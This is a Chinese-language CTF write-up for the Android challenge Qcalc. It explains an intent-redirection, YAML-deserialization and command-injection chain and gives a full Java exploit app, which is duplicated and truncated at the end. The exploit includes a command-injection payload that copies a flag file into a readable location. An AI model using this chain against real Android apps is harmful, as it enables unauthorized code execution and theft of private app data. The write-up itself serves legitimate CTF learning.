-
-
[原创]强网杯s9初赛 Qcalc wp
-
发表于: 3天前 407
-
MainActivity可通过qiangcalc://calculate形式的uri启动
MainActivity收到intent时会调用handleIntent方法
handleIntent会判断Action并取出其中的expression参数并传入processDeeplinkExpression中
processDeeplinkExpression会判断传入的expression是否为intent scheme,是的话将该uri转成intent并存入顶层intent的fallback参数中,并计算哈希一并存入。
如果是普通的表达式的话,该方法会取出表达式的两个操作数并调用onEqual()进行计算
onEqual中值得注意的是除法,如果除以0会抛出除0异常,并交由异常处理来处理。catch中取出了fallback并存入了一些新的参数(作用不大),最后将fallback作为bridgeIntent的参数origIntent传入,并启动BridgeActivity
BridgeActivity首先会对传入的intent进行校验,大部分的参数都是onEqual中硬编码的所以不会错,唯一需要注意的是this.validateToken方法,对bridge_token参数进行了校验,将其与包名的sha256进行了比较,这个参数在之前都没有出现过,所以是一开始就要在fallback对应的intent scheme里就要传入

验证通过后,为origIntent赋予通过provider读写(addFlags(3))/data/data/com.qinquang.calc/files/history.yml的权限并启动Activity
上面的分析中,我们最后发现有一个content provider,该provider不导出,但设置了grantUriPermissions=“true”,这样我们可以传入intent来调用该provider。但是目标apk中唯一授权的只有/data/data/com.qinquang.calc/files/history.yml,意味着我们不能直接通过provider读取flag只能读写history.yml
HistoryManager.loadHistory中通过yaml.load反序列化了history.yml文件,并判断其是否为intent,是的话就启动该intent。但是我们在上面已经可以构造一个intent了,再构造一个意义不大
注意到有一个没调用过的类PingUtil,很明显的后门函数,命令拼接,那我们可以直接利用上面的反序列化执行该类的init方法从而实现命令执行
本来考虑直接通过网络传出flag或者先写入外部存储然后再读取,但很不幸apk没有这两个权限。考虑到我们可以对history.yml进行读取,我们可以将flag写入yml文件中再进行读取。
剩下的问题就是如何触发反序列化了,loadHistory在onCreate和saveHistory中有调用,saveHistory在onEqual的末尾有调用,我们可以通过传入intent进行一次正常的运算来调用saveHistory
但在saveHistory中,调用完loadHistory后他会对yml进行覆写,会把我们的flag给清掉,所以我们需要卡一个timing,在写入flag后和flag被覆写前趁机读取出flag,这就要自己延时慢慢调了
综上,利用链可总结为:
由于是复现,就不将flag发送到外网了,这里就直接将flag写到log里,exp如下
在日志里获得flag
package com.example.qcalc;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.util.Log;
import androidx.activity.EdgeToEdge;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.graphics.Insets;
import androidx.core.view.ViewCompat;
import androidx.core.view.WindowInsetsCompat;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
public class MainActivity extends AppCompatActivity {
private static final String TAG = "qcalcccccccc";
private String getToken(){
try {
byte[] arr_b = MessageDigest.getInstance("SHA-256").digest("com.qinquang.calc".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for(int i = 0; i < 8; ++i) {
sb.append(String.format("%02x", ((byte)arr_b[i])));
}
return sb.toString();
}
catch(Exception e) {
return "Error";
}
}
private String getExp()
{
String yaml = "!!com.qinquang.calc.PingUtil 127.0.0.1; /system/bin/cat /data/data/com.qinquang.calc/files/flag.txt > /data/data/com.qinquang.calc/files/history.yml";
return yaml;
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Log.d(TAG,"123123123");
Intent intent = this.getIntent();
Uri yamlUri = null;
if (intent != null)
yamlUri = intent.getData();
// 因为该exp会让目标apk再次调用该Activity,所以该Activity实际上执行了两次,第一次是直接执行,第二次通过intent执行并返回了history.yml的uri,所以要进行一次判断
if (yamlUri == null)
{
// 传入fallback
Intent fallBackIntent = new Intent(Intent.ACTION_VIEW);
fallBackIntent.setClassName(getPackageName(),MainActivity.class.getName());
fallBackIntent.putExtra("bridge_token", getToken());
String uri = fallBackIntent.toUri(Intent.URI_INTENT_SCHEME);
uri = Uri.encode(uri);
Intent intent1 = new Intent(Intent.ACTION_VIEW, Uri.parse("qiangcalc://calculate?expression=" + uri));
intent1.setPackage("com.qinquang.calc");
startActivity(intent1);
// 触发div 0
Log.d(TAG,"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
Intent intent2 = new Intent(Intent.ACTION_VIEW, Uri.parse("qiangcalc://calculate?expression=0%2F0"));
intent2.setPackage("com.qinquang.calc");
intent2.putExtra("fallback",fallBackIntent);
startActivity(intent2);
finish();
return ;
}
// 获得history.yml读写权限,写入exp
try {
OutputStream os = getContentResolver().openOutputStream(yamlUri);
os.write(getExp().getBytes(StandardCharsets.UTF_8));
} catch (Exception e) {
throw new RuntimeException(e);
}
// 进行一次正常运算,触发反序列化漏洞
Intent intent3 = new Intent(Intent.ACTION_VIEW, Uri.parse("qiangcalc://calculate?expression=2%2B2"));
intent3.setPackage("com.qinquang.calc");
startActivity(intent3);
// 卡timing读取flag,需要慢慢调
final Uri yaml = yamlUri;
new Handler().postDelayed(new Runnable() {
@Override
public void run() {
try {
StringBuilder sb = new StringBuilder();
InputStream is = getContentResolver().openInputStream(yaml);
InputStreamReader ir = new InputStreamReader(is, StandardCharsets.UTF_8);
BufferedReader br = new BufferedReader(ir);
String line;
while ((line = br.readLine()) != null)
sb.append(line);
Log.d(TAG, "flag: "+ sb.toString());
} catch (Exception e) {
}
}
},50); // 延时1秒
}
}package com.example.qcalc;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.util.Log;
import androidx.activity.EdgeToEdge;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.graphics.Insets;
import androidx.core.view.ViewCompat;
import androidx.core.view.WindowInsetsCompat;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
public class MainActivity extends AppCompatActivity {
private static final String TAG = "qcalcccccccc";
private String getToken(){
try {
byte[] arr_b = MessageDigest.getInstance("SHA-256").digest("com.qinquang.calc".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for(int i = 0; i < 8; ++i) {
sb.append(String.format("%02x", ((byte)arr_b[i])));
}
return sb.toString();
}
catch(Exception e) {
return "Error";
}
}
private String getExp()
{
String yaml = "!!com.qinquang.calc.PingUtil 127.0.0.1; /system/bin/cat /data/data/com.qinquang.calc/files/flag.txt > /data/data/com.qinquang.calc/files/history.yml";
return yaml;
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Log.d(TAG,"123123123");
Intent intent = this.getIntent();
Uri yamlUri = null;
if (intent != null)
yamlUri = intent.getData();
// 因为该exp会让目标apk再次调用该Activity,所以该Activity实际上执行了两次,第一次是直接执行,第二次通过intent执行并返回了history.yml的uri,所以要进行一次判断
if (yamlUri == null)